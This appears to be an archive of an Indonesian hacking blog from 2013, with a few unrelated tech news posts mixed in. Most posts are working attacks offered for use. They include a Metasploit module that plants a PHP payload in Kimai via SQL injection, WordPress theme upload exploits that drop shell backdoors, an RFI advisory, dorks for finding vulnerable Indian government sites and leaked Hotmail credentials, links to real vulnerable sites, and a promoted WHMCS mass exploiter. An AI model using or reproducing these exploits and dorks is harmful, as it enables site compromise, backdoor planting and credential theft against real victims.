Thursday 28 November 2013

Kimai 0.9.2 db_restore.php SQL Injection Vulnerability

##
# This module requires Metasploit: http//metasploit.com/download
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Kimai v0.9.2 'db_restore.php' SQL Injection",
      'Description'    => %q{
          This module exploits a SQL injection vulnerability in Kimai version
        0.9.2.x. The 'db_restore.php' file allows unauthenticated users to
        execute arbitrary SQL queries. This module writes a PHP payload to
        disk if the following conditions are met: The PHP configuration must
        have 'display_errors' enabled, Kimai must be configured to use a
        MySQL database running on localhost; and the MySQL user must have
        write permission to the Kimai 'temporary' directory.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'drone (@dronesec)', # Discovery and PoC
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'References'     =>
        [
          ['EDB'       => '25606'],
          ['OSVDB'     => '93547'],
        ],
      'Payload'        =>
        {
          'Space'      => 8000, # HTTP POST
          'DisableNops'=> true,
          'BadChars'   => "\x00\x0a\x0d\x27"
        },
      'Arch'           => ARCH_PHP,
      'Platform'       => 'php',
      'Targets'        =>
        [
          # Tested on Kimai versions 0.9.2.beta, 0.9.2.1294.beta, 0.9.2.1306-3
          [ 'Kimai version 0.9.2.x (PHP Payload)', { 'auto' => true } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'May 21 2013',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI',  [true,  'The base path to Kimai', '/kimai/']),
          OptString.new('FALLBACK_TARGET_PATH', [false, 'The path to the web server document root directory', '/var/www/']),
          OptString.new('FALLBACK_TABLE_PREFIX', [false, 'The MySQL table name prefix string for Kimai tables', 'kimai_'])
        ], self.class)
  end

  #
  # Checks if target is Kimai version 0.9.2.x
  #
  def check
    print_status("#{peer} - Checking version...")
    res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, "index.php") })
    if not res
      print_error("#{peer} - Request timed out")
      return Exploit::CheckCode::Unknown
    elsif res.body =~ /Kimai/ and res.body =~ /(0\.9\.[\d\.]+)<\/strong>/
      version = "#{$1}"
      print_good("#{peer} - Found version: #{version}")
      if version >= "0.9.2" and version <= "0.9.2.1306"
        return Exploit::CheckCode::Detected
      else
        return Exploit::CheckCode::Safe
      end
    end
    Exploit::CheckCode::Unknown
  end

  def exploit

    # Get file system path
    print_status("#{peer} - Retrieving file system path...")
    res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'includes/vars.php') })
    if not res
      fail_with(Failure::Unknown, "#{peer} - Request timed out")
    elsif res.body =~ /Undefined variable: .+ in (.+)includes\/vars\.php on line \d+/
      path = "#{$1}"
      print_good("#{peer} - Found file system path: #{path}")
    else
      path = normalize_uri(datastore['FALLBACK_TARGET_PATH'], target_uri.path)
      print_warning("#{peer} - Could not retrieve file system path. Assuming '#{path}'")
    end

    # Get MySQL table name prefix from temporary/logfile.txt
    print_status("#{peer} - Retrieving MySQL table name prefix...")
    res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'temporary', 'logfile.txt') })
    if not res
      fail_with(Failure::Unknown, "#{peer} - Request timed out")
    elsif prefixes = res.body.scan(/CREATE TABLE `(.+)usr`/)
      table_prefix = "#{prefixes.flatten.last}"
      print_good("#{peer} - Found table name prefix: #{table_prefix}")
    else
      table_prefix = normalize_uri(datastore['FALLBACK_TABLE_PREFIX'], target_uri.path)
      print_warning("#{peer} - Could not retrieve MySQL table name prefix. Assuming '#{table_prefix}'")
    end

    # Create a backup ID
    print_status("#{peer} - Creating a backup to get a valid backup ID...")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'db_restore.php'),
      'vars_post' => {
        'submit'  => 'create backup'
      }
    })
    if not res
      fail_with(Failure::Unknown, "#{peer} - Request timed out")
    elsif backup_ids = res.body.scan(/name="dates\[\]" value="(\d+)">/)
      id = "#{backup_ids.flatten.last}"
      print_good("#{peer} - Found backup ID: #{id}")
    else
      fail_with(Failure::Unknown, "#{peer} - Could not retrieve backup ID")
    end

    # Write PHP payload to disk using MySQL injection 'into outfile'
    fname = "#{rand_text_alphanumeric(rand(10)+10)}.php"
    sqli  = "#{id}_#{table_prefix}var UNION SELECT '<?php #{payload.encoded} ?>' INTO OUTFILE '#{path}/temporary/#{fname}';-- "
    print_status("#{peer} - Writing payload (#{payload.encoded.length} bytes) to '#{path}/temporary/#{fname}'...")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'db_restore.php'),
      'vars_post' => Hash[{
        'submit'  => 'recover',
        'dates[]' => sqli
      }.to_a.shuffle]
    })
    if not res
      fail_with(Failure::Unknown, "#{peer} - Request timed out")
    elsif res.code == 200
      print_good("#{peer} - Payload sent successfully")
      register_files_for_cleanup(fname)
    else
      print_error("#{peer} - Sending payload failed. Received HTTP code: #{res.code}")
    end

    # Remove the backup
    print_status("#{peer} - Removing the backup...")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'db_restore.php'),
      'vars_post' => Hash[{
        'submit'  => 'delete',
        'dates[]' => "#{id}"
      }.to_a.shuffle]
    })
    if not res
      print_warning("#{peer} - Request timed out")
    elsif res.code == 302 and res.body !~ /#{id}/
      vprint_good("#{peer} - Deleted backup with ID '#{id}'")
    else
      print_warning("#{peer} - Could not remove backup with ID '#{id}'")
    end

    # Execute payload
    print_status("#{peer} - Retrieving file '#{fname}'...")
    res = send_request_raw({
      'uri' => normalize_uri(target_uri.path, 'temporary', "#{fname}")
    }, 5)
  end
end

# 6E323FA65786C91A   1337day.com [2013-11-28]   2A49EC6D4B9669E0 #


Labels:

Wednesday 27 November 2013

Google Shop Dorks

Google Shop Dorks. Tapi ini bisa digunakan untuk patokan agar agan mau order dimana saja yang kalian suka. Biasanya di webshop yang tersedia. Nah kalau gak mau susah susah bisa gunakan dork alternatif di bawah ini : 

• site:*.com intitle:"Thank You For Your Order" intext:Click Here to Download

• site:*.com intitle:"Thank You For Your Purchase" intext:Click Here to Download

• intitle:Thank you for your Purchase! intext:PLR OR MRR OR Package OR Bonus

• intitle:Thank you for your order! intext:PLR OR MRR

• intitle:Thank you for your Purchase! intext:PLR OR MRR

• inurl:/thankyou*.html intitle:Thank you for your order! intext:Click Here to Download

• inurl:thanks intext:"Thank You For Your Order!" "Click Here" filetype:html

• intitle:Thank You For Your Order! intext:Private Label

• intitle:Thank You For Your Purchased! intext:Private Label

• intext:"Thank You For Your Order" intext:PLR

• "Thank You For Your Order!" intext:Master Resell filetype:html

• "Thank You For Your Order! Your Credit Card Will Show A Charge From"

• intitle:"Thank You For Your Order!" intext:download

• intitle:"Thank You For Your Order" intext:Click Here To Download Now

• intitle:Thank you for your purchase! intext:Click Here to Download

  • Etc ..

Sekian, dan semoga dapat membantu kalian . Assalamualaikum ..

Labels:

Tuesday 26 November 2013

Best Google Dorks Untuk Cari India Site SQLI Vuln

10 dork terkenal untuk mencari web india yang vuln dengan sqli websites.Langsung saja :
Screanshot:



1#
 inurl:.co.in & inurl:.php?id=

2#
 intext:india & inurl:.php?id=

3#
 inurl:index.php?id= & inurl:.co.in

4#
 inurl:.co.in & inurl:article.php?ID=

5#
 inurl:.co.in & inurl:Pageid=

6#
 inurl:.co.in & inurl:staff_id=

7#
 inurl:.gov.in & inurl:.php?id= (this for gov sites)

8#
 inurl:.co.in & inurl:newsitem.php?num=

9#
 inurl:.nic.in & inurl:.php?id= (this for NiC domains)

10#
 inurl:india & inurl:.php?id=

Selamat mencoba..

Labels: , ,

Wordpress Plugin WPE Indoshipping Remote File Inclusion

```========================================================
[+] Title : Wordpress Plugin WPE Indoshipping Remote File Inclusion
[+] Author : Altiiever
[+] Version : 2.5.0
[+] Download : http://downloads.wordpress.org/plugin/wpe-indoshipping.2.5.0.zip
[+] Vulnerability : RFI
```========================================================

|
| [ Vulnerable ]
|
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/wpe_indoshipping.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin-functions.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin.php?app_base_path= [cukZ]
|
| [ Bug ]
|
| [!] wpe_indoshipping.php
| -include $app_base_path.'admin/admin.php';
| [!] admin-functions.php
| -include_once $app_base_path.'upload/'.$dbfile;
| [!] admin.php
| -include $app_base_path.'admin/admin-functions.php';
| -include $app_base_path.'admin/shipping-manager.php';
| -include $app_base_path.'admin/form-builder.php';
| -include $app_base_path.'admin/tools.php';
| -include $app_base_path.'assets/readme.html';
|

# F7370C7E850A2BBF 1337day.com [2013-11-27] 1098BDC6E5875201 #

Labels:

Friday 22 November 2013

Cara Untuk Posting Blog Otomatis ke Facebook dan Twitter


Sebuah pertanyaan umum bahwa klien bertanya kepada saya adalah tentang bagaimana untuk secara otomatis memperbarui halaman mereka Facebook, akun Twitter atau profil sosial lainnya, ketika mereka mempublikasikan posting blog baru.
Ada banyak cara untuk melakukan ini - di sini adalah beberapa metode yang saya sukai. Meskipun ada beberapa plugin WordPress yang tersedia untuk jenis tugas, secara umum saya tidak menggunakannya. Kadang-kadang mereka sulit untuk mengkonfigurasi, atau mungkin hanya tidak bisa diandalkan. Plus, mengapa menambahkan plugin unnnecessary ketika Anda dapat mencapai hal hal yang sama sama dengan baik, jika tidak lebih baik, cara lain?
Layanan ini berbasis RSS, sehingga Anda akan perlu mengetahui alamat feed RSS Anda. Jika Anda menggunakan WordPress dan belum dikonfigurasi Feedburner, alamat feed Anda umumnya:


  • yourdomain.com/feed



Jika Anda telah mengkonfigurasi Feedburner, Anda akan menemukan link ke feed Anda di akun Feedburner. Jika sudah diatur dengan benar di situs Anda, tentunya Anda bisa klik RSS / Berlangganan link Anda sendiri dan ambil url dari address bar.



  • DLVR.IT

Dlvr.it adalah layanan benar-benar efisien yang memungkinkan Anda mengatur otomatis postingan dengan cepat dan mudah . Ini adalah layanan gratis dan Anda dapat menggunakannya untuk memperbarui profil Facebook, Facebook Page, akun Twitter , LinkedIn dan lain-lain .
Jika Anda memilih ini, memiliki beberapa pilihan sophisiticated cantik Anda dapat mengkonfigurasi , seperti jumlah kali untuk posting per jam , berapa oftern untuk memeriksa feed , format apa untuk posting cerita di Facebook dll Jadi Anda mendapatkan banyak fleksibilitas dan itu sudah sangat handal . Biasanya cegukan dalam hal-hal tidak mendapatkan diposting karena situs tujuan yang turun - seperti ketika server Twitter kelebihan beban .
Dlvr.it memiliki shortener url sendiri dan akan memberikan statistik pada klik feed dll , tetapi jika Anda memilih Bitly ( atau beberapa layanan lain ), Anda dapat mengkonfigurasi account Anda untuk menggunakan itu. Anda dapat mengatur beberapa feed dan tujuan dengan dlvr.it jadi jika Anda memiliki beberapa situs Web yang dapat Anda lakukan otomatisasi untuk mereka semua dalam satu tempat pusat ini .

  • IFTTT.com

IFTTT adalah layanan yang lebih kompleks yang dapat melakukan beberapa hal yang sangat dingin di luar hanya posting blog Anda ke Twitter dan Facebook . Mereka saat ini mendukung sekitar 50 berbeda saluran media sosial dan Anda membuat tindakan , atau " resep " dengan rumus sebagai berikut :
" Jika ini ..... maka .... bahwa"
Jadi misalnya : " Jika saya seorang mempublikasikan posting blog baru , kemudian posting ke Twitter " ia address bar .



Labels:

Tuesday 19 November 2013

Gmail Easy Verification Bypass

Pertama dapatkan nomor spanyol gratisnya disini :

Dan sesuaikan tipe vertifikasi kedalam nomor spanyol 

Screanshot :


Lalu akan mendapatkan code vertifikasi dari IIeida 


 Dan masukan code vertifikasinya ,lalu gmail anda sudah dalam tervertifikasi secara cepat dan akurat . Semoga bermanfaat,

Labels:

Admin Finder PHP Based

Hello guys ! kali ini saya akan berbagi kepada kalian semua tentang sedikit ilmu dari saya yang menyangkut pentest :) . Mungkin kalian kebingungan jika menemukan halaman admin pada situs . Kalian bisa gunakan alat dari saya untuk menggunakan admin finder, langsung saja :


Download disini :


Screanshot :



  • Gunakan dengan XAMPP atau WAMPP 
  • Atau bisa juga dengan web hosting kalian 
Semoga Bermanfaat .

Labels: ,

Saturday 16 November 2013

Mail ID Hacking Dengan Goolge Dorks

Saya akan membagikan beberapa dork guys ! dengan dork ini insyallah akan menembus id dan password dari database google .Jadi mari kita mulai sekarang :

Dorks Basic(umum) :



  • ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e
  • ext:sql intext:"INSERT INTO" intext:@hotmail.com intext:password
  • ext:sql intext:@hotmail.com intext:password
Masukan dork ke google
Screanshot:


Lalu pilih salah satu link / site, maka akan tampak seperti ini.
Screanshot:


Password bisa jadi dalam bentuk md5 atau password asli . Tergantung tampilan ganteng kalian :D . Semoga Bermanfaat ,dan terima kasih

Labels:

WHMCS 0Day Auto Exploiter PHP Code 5.2.8


Hari ini saya hadir Anda senjata paling mematikan untuk massa penghancuran. Alat ini menargetkan WHMCS melalui kerentanan SQL injection yang disebabkan karena Daftar global yang digunakan oleh programmer bodoh mereka.

Seperti biasa, Anda hanya perlu memberikan Dorks, ambil jagung pop, duduk dan menonton diri pwning shi besar! T.T Ribuan perusahaan web hosting rentan terhadap eksploitasi ini. Dengan 10 Dorks, saya bisa mengumpulkan login WHMCS . Itu berarti ribuan akar kerentanan.Langsung saja kalian simak baik-baik:

Dork :
inurl:submitticket.php site:.com or inurl:submitticket.php site:.net
inurl:submitticket.php site:.us
inurl:submitticket.php site:.eu
inurl:submitticket.php site:.org
inurl:submitticket.php site:.uk
intext:"Powered by WHMCompleteSolution"
intext:"Powered by WHMCompleteSolution" inurl:clientarea.php
inurl:announcements.php intext:"WHMCompleteSolution"
intext:"Powered by WHMCS"
Kreasikan dork menurut kreatifitas kalian *

Source Code :
http://pastebin.com/Dfce5W5v


  • Hanya men-copy pastekan kenotepad dan menamainya dengan ex.(PHP)
  • Upload Exploit tersebut kedalam hosting atau bisa di akses melalui WAMPP atau XAMPP .
Screanshot :

Semoga bermanfaat ! Salam ...


Labels: , ,

Saturday 9 November 2013

WordPress themekernel-theme Themes Remote File

# Exploit Title: WordPress themekernel-theme Themes Remote File Upload Vulnerability
# Author: iskorpitx
# Date: 6/11/2013
# Vendor Homepage: http://www.wikmag.com/
# Themes Link: http://themeforest.net/item/kernel-premium-wordpress-blog-magazine-theme-/857077
# Infected File: upload-handler.php
# Category: webapps
# Google dork: inurl:/wp-content/themes/kernel-theme/
# Tested on : Windows/Linux
###################################################################################################

# Exploit
# You must ready XAMPP Application to save Exploit under PHP extention . uploa#d.php file is your name shell (save on one directory exploit)


<?php
$uploadfile="upload.php";
$ch = curl_init("http://target/wp-content/themes/kernel-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print "$postResult";
?>

Your File Uploaded access:
http://target/wordpress/wp-content/uploads/2013/11/upload.php

Labels:

Friday 8 November 2013

Indonesia, pengguna Opera Mobile Store terbanyak ke-3 di Dunia



Perwakilan Opera mengumumkan bahwa hari ini Opera Mobile Stores sudah memiliki lebih dari 75 juta pengunjung tiap bulannya dan melayani lebih dari 140.000 aplikasi, dengan India dan Indonesia sebagai negara dengan basis pengguna terbanyak mereka.

Secara peringkat, India berada di peringkat teratas, diikuti oleh Amerika Serikat dan Indonesia. Opera juga mengungkapkan bahwa India, Brazil, Afrika Selatan, dan Indonesia secara total sudah menyumbangkan 35 persen dari angka download di Opera Mobile Store secara global.

Opera Mobile Store bisa ditemukan di browser mobile Opera. Karena banyaknya pengguna yang menggunakan browser mobile Opera di India dan Indonesia, tidak heran jika pengguna di kedua negara itu lebih sering mengunjungi toko Opera Mobile Store. Opera masih merahasiakan jumlah pengguna mereka di India dan Indonesia.

Negara lain seperti Filipina, Bangladesh, Malaysia, dan Vietnam juga banyak menggunakan Opera Mobile Store.

Juru bicara Opera, Falguni Bhuta mengatakan bahwa kesuksesan Opera Mobile Store disebabkan oleh banyaknya pilihan aplikasi gratis yang tersedia:

"Kami sangat berfokus pada aplikasi gratis, karena kami mengerti bahwa pengguna kami di negara-negara tersebut umumnya tertarik men-download aplikasi gratis, dan mereka menyukainya. Kami punya lebih dari 145.000 aplikasi, sehingga kami juga bisa menawarkan sejumlah aplikasi yang bagus kepada pengguna kami."

Jadi aplikasi apa saja yang di-download oleh pengguna Opera Mobile Store? Opera memberikan daftar 10 aplikasi yang paling banyak di-download saat ini:
  1. Facebook ciptaan Facebook (Java)
  2. TubeMate YouTube Downloader ciptaan Devian Studio (Android)
  3. Download Manager for Android ciptaan FDDM
  4. Chat for Facebook PRO ciptaan Mail-Bit LTD (multi-platform)
  5. NewsHunt ciptaan Eterno Infotech (Java)
  6. Frim ciptaan Ardetiel Service Limited (multi-platform)
  7. Angry Birds Rio ciptaan Rovio Entertainment Ltd (Android)
  8. eBuddy Messenger ciptaan eBuddy (multi-platform)
  9. WeChat ciptaan Tencent Technology (Shenzhen) Company Limited (multi-platform)
  10. Overdrive ciptaan Zapak.com (multi-platform)

Meskipun di barat beberapa orang menganggap Opera sebagai 'browser hebat yang tidak dipakai,' di Asia, browser ini digunakan oleh banyak orang, terutama di India, dimana Opera sudah membuat beberapa persetujuan dengan OEM.

Labels: ,

Website Iran Exploit Database


Mungkin kalian tidak tahu ternyata iran juga mempunyai sebuah situs pendukung untuk menyimpan segala syntax alur dan di simpan ke dalam database mereka .Dan situs tersebut beralamatkan di http://iedb.ir/

Sementara itu mereka juga menyisipkan forum dan peralatan berupa tool PhP yang tentunya untuk perlengkapan mereka .

Screanshot :

Selamat ber-exploit ..

Labels:

Download Crypo.com Script Code PHP


Lindungi password penting kalian dengan enkripsi yang kuat secara online ini.
Mengenkripsi dan mendekripsi data sensitif menggunakan encryptors  yang kuat ini (gratis alat keamanan online).


crypo.com adalah sebuah situs yang digunakan untuk mengenkripsi dan mendekripsi data ... (encrypt/decrypt)
Jika kalian dengan keinginan untuk membuat situs kalian sendiri seperti ini maka Anda berada di tempat yang tepat !
Anda dapat men-download situs ini file basis PHP dari link di bawah ini:




Screanshot Tampilan :


Semoga bermanfaatbagi kalian semua ... 
Assalamualaikum Wr.Wb. .

Labels: ,

Thursday 7 November 2013

WordPress Curvo Themes CSRF File Upload Vulnerability

# Exploit Title: WordPress Curvo Themes CSRF File Upload Vulnerability
# Author: Byakuya
# Date: 10/26/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://www.wphub.com/themes/curvo-by-themeforest/
# Price: $35
# Affected Version: Unknown
# Infected File: upload_handler.php
# Category: webapps/php
# Google dork: inurl:/wp-content/themes/curvo/
###################################################################################################

# Exploit & POC : ( Save in XAMPP doc. ex.php and Run It ) After that upload your shell with tamper data .!
Attention !

<form enctype="multipart/form-data"
action="http://target/wordpress/wp-content/themes/curvo/functions/upload-handler.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

#File access path:
http://target/wordpress/wp-content/uploads/[FILE]
or
http://target/wordpress/wp-content/uploads/[year]/[month]/[FILE] <-- your file uploaded

Labels:

WordPress themekernel-theme Themes Remote File Upload Vulnerability

###################################################################################################
# Exploit Title: WordPress themekernel-theme Themes Remote File Upload Vulnerability
# Author: iskorpitx
# Date: 6/11/2013
# Vendor Homepage: http://www.wikmag.com/
# Themes Link: http://www.wikmag.com/kernel-premium-magazine-theme-by-themeforest-orange-themes.html
# Infected File: upload-handler.php
# Category: webapps
# Google dork: inurl:/wp-content/themes/kernel-theme/
# Tested on : Windows/Linux
###################################################################################################

# Exploit
(Save under XAMPP or WAMPP on one directories) and access it from localhost

<?php
$uploadfile="upload.php";
$ch = curl_init("http://[targetsitus]/wp-content/themes/kernel-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print "$postResult";
?>

Shell Backdoor aksesnya ada berada di tempat ini :
http://[targetsitus]/[path]/wp-content/uploads/[year]/[month]/upload.php <-- backdoor name

Labels: ,

Ocreative Design Studio SQL Injection Vulnerabilites



: # Exploit Title : Ocreative Design Studio SQL Injection
Vulnerabilities
: # Date : 06 November 2013
: # Author : r1q
: # CMS Developer : http://www.ocreativedesign.com/
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection
: # Tested On : Google Chrome Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Cisadane, X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club,


DORKS (Cara mencari situs targetnya) :
================================
intext:Web Design & Hosting by Ocreative Design Studio inurl:/?ID=

Atau kreasikan sendiri Google Dork sesuai kehendak kalian :)

Penjelasan
================

SQL Injection :
POC : http://[Site]/[Path]/?ID=[SQLi]
Contoh situs yang bercelah :
http://www.downtownhartland.com/event-de...hp?ID=499'
http://www.terrastaffing.com/contact-us/...ons/?ID=6'
http://www.wcfls.org/news.php?ID=177'
http://www.citypubnationwide.com/south-f...p?ID=7797'

Labels: ,

Monday 4 November 2013

Jobs-Indo Situs Penyedia Lowongan Kerja


Meskipun saya sendiri masih anak dibawah 17 tahun tapi ini sekedar pengetahuan saya dari dunia cyber . Ya, kali ini saya akan memberitahukan sebuah situs yang kiranya dapat memberikan manfaat bagi anda yang membutuhkan sesuatu jobs atau pekerjaan di indonesia . Langsung saja lihat websitenya di link dibawah ini :

*Kelebihan situsnya : 


  • desain website yang dapat mempermudahkan mencari suatu tema pekerjaan
  • berbagai macam perusahaan mencari pegawainya dengan memasangnya disini
  • disertai submit lamaran kerja 
  • dan masih banyak yang lainnya 
Sekian ini dari saya . Semoga bermanfaat bagi anda semua yang sekedar melihat postingan saya . Salam ...

Labels: